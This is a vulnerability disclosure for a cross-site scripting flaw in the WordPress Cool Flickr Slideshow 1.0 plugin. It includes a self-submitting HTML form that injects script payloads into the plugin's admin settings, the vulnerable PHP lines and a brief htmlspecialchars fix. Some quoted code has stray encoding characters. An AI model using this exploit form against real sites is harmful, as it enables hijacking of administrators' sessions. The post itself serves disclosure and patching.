WordPress Cool Flickr Slideshow 1.0 Cross Site Scripting

WordPress Cool Flickr Slideshow plugin version 1.0 suffers from a cross site scripting vulnerability.


MD5 | 18c891fbfd15b9e7b0347e9f5327ed53

___________________________________________________
|
| Exploit Title: Wordpress cool-flickr-slideshow Plugin Cross Site Scripting(xss)
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage:https://wordpress.org/plugins/cool-flickr-slideshow/
| Software Link: https://downloads.wordpress.org/plugin/cool-flickr-slideshow.1.0.zip
| Version: 1.0
| Date: 2017 - 07 - 9
| Tested on: Kali-Linux /FireFox
|__________________________________________________

Exploit :

<form name="form1" method="POST" Action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=flickr-gallery-settings">
<input type="hidden" name="flickr-gallery_hidden" value="Y" />
<input type="hidden" name="flickr_type" value=""><script>alert("xss1")</script>" />
<input type="hidden" name="flickr_uid" value="1" />
<input type="hidden" name="flickr_api" value="MMM" />
<input type="hidden" name="flickr_groupid" value='1' />
<input type="hidden" name="flickr_set" value="" />
<input type="hidden" name="flickr_width" value='"><script>alert("xss 2")</script>' />
<input type="hidden" name="flickr_height" value='"><script>alert("xss 3")</script>' />
<input type="hidden" name="Submit" value="Save" />
</form>
<script language="javascript">
setTimeout('form1.submit()', 1);
</script>

__________________________________________________


Vulnerable File :
/wp-content/plugins/cool-flickr-slideshow/flickr_gallery_admin.php

Vulnerable code:


line 154 :
<select id="flickr_type" name="flickr_type" onchange="javascript:ChangeFlickrType(this.value);">
<option selected="" value=""/><script>alert(1000)</script>">SELECT</option>
A A <option value="user">User</option>A A
A A <option value="group">Group</option>
A A <option value="set">Set</option>
A A <option value="api">API</option> A
A
A </select>

line 185 :
<p><span style="width: 75px;float: left;"><?php _e("Width: " ); ?>
</span><input type="text" name="flickr_width" value="<?php echo $flickr_width; ?>" size="20"></p>


line 186 :
<p><span style="width: 75px;float: left;"><?php _e("Height: " ); ?>
</span><input type="text" name="flickr_height" value="<?php echo $flickr_height; ?>" size="20"></p>


__________________________________________________

#patch:
For fix this vulnerability you use htmlspecialchars() function .
__________________________________________________

Discovered By : M.R.S.L.Y
__________________________________________________



Related Posts